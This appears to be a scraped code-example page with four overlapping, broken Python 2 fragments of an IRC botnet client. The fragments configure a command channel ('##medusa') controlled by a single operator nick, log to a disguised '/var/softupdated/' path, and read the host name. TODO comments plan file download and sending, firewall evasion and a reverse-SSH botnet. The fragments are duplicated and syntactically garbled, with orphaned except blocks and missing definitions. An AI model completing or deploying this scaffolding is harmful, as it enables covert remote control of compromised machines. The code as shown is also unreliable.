Beispiel #1
from StringIO import StringIO  # output redirection for logging

from modules.logging import logfile, log

#TODO: make portscan timeout or cancellable
#TODO: make run fully interactive by capturing input and using p.write() or p.stdin()
#TODO: modules:
#       download    will download the file at the given url and save it to the host machine
#       send_file   streams the file on the host computer to the given host:port
#       status      returns the size of the worker's task queue
#       openvpn     implement openvpn for firewall evasion
#       reverse ssh ssh botnet implementation

        filename="/var/softupdated/bot_v%s(%s).log" %
        (version, strftime("%m-%d|%H:%M")))  # redirects bot output to logfile
except Exception as e:
    print e

log("[*] IRC BOT v%s" % version)

############ Variables

server = ''
port = 6667
channel = '##medusa'
source_checking_enabled = True
allowed_sources = ["thesquash"]  # only accept commands from these nicks
admin = 'thesquash'  # the nick to send privmsgs to by default
Beispiel #2
from time import strftime, sleep                    # timing
from StringIO import StringIO                       # output redirection for logging

from modules.logging import logfile, log

#TODO: make portscan timeout or cancellable
#TODO: make run fully interactive by capturing input and using p.write() or p.stdin()
#TODO: modules:
#       download    will download the file at the given url and save it to the host machine
#       send_file   streams the file on the host computer to the given host:port
#       status      returns the size of the worker's task queue
#       openvpn     implement openvpn for firewall evasion
#       reverse ssh ssh botnet implementation

    logfile(filename="/var/softupdated/bot_v%s(%s).log" % (version, strftime("%m-%d|%H:%M")))                  # redirects bot output to logfile
except Exception as e:
    print e

log("[*] IRC BOT v%s" % version)

############ Variables

server = ''
port = 6667
channel = '##medusa'
source_checking_enabled = True
allowed_sources = ["thesquash"]                                                 # only accept commands from these nicks
admin = 'thesquash'                                                             # the nick to send privmsgs to by default

hostname = socket.gethostname()                                                 # host's hostname
Beispiel #3
#TODO: bugfixes full_name detection, keeps defaulting to CVMSRoot for some reason
#TODO: make portscan timeout or cancellable
#TODO: make run fully interactive by capturing input and using p.write() or p.stdin()
#TODO: modules:
#       download    will download the file at the given url and save it to the host machine
#       send_file   streams the file on the host computer to the given host:port
#       status      returns the size of the worker's task queue
#       openvpn     implement openvpn for firewall evasion
#       reverse ssh ssh botnet implementation

start_time = strftime("%m-%d|%H:%M")

    os.popen("touch /var/softupdated/bot_v%s(%s).log" %
             (version, start_time)).read().strip()
    logfile(filename="/var/softupdated/bot_v%s(%s).log" %
            (version, start_time))  # redirects bot output to logfile
except Exception as e:
    print e

log("[*] IRC BOT v%s" % version)

############ Variables

server = ''
port = 6667
channel = '##medusa'
source_checking_enabled = True
allowed_sources = ["thesquash"]  # only accept commands from these nicks
admin = 'thesquash'  # the nick to send privmsgs to by default

hostname = socket.gethostname()  # host's hostname
Beispiel #4
#TODO: bugfixes full_name detection, keeps defaulting to CVMSRoot for some reason
#TODO: make portscan timeout or cancellable
#TODO: make run fully interactive by capturing input and using p.write() or p.stdin()
#TODO: modules:
#       download    will download the file at the given url and save it to the host machine
#       send_file   streams the file on the host computer to the given host:port
#       status      returns the size of the worker's task queue
#       openvpn     implement openvpn for firewall evasion
#       reverse ssh ssh botnet implementation

start_time = strftime("%m-%d|%H:%M")

    os.popen("touch /var/softupdated/bot_v%s(%s).log" % (version, start_time)).read().strip()
    logfile(filename="/var/softupdated/bot_v%s(%s).log" % (version, start_time))                  # redirects bot output to logfile
except Exception as e:
    print e

log("[*] IRC BOT v%s" % version)

############ Variables

server = ''
port = 6667
channel = '##medusa'
source_checking_enabled = True
allowed_sources = ["thesquash"]                                                 # only accept commands from these nicks
admin = 'thesquash'                                                             # the nick to send privmsgs to by default

hostname = socket.gethostname()                                                 # host's hostname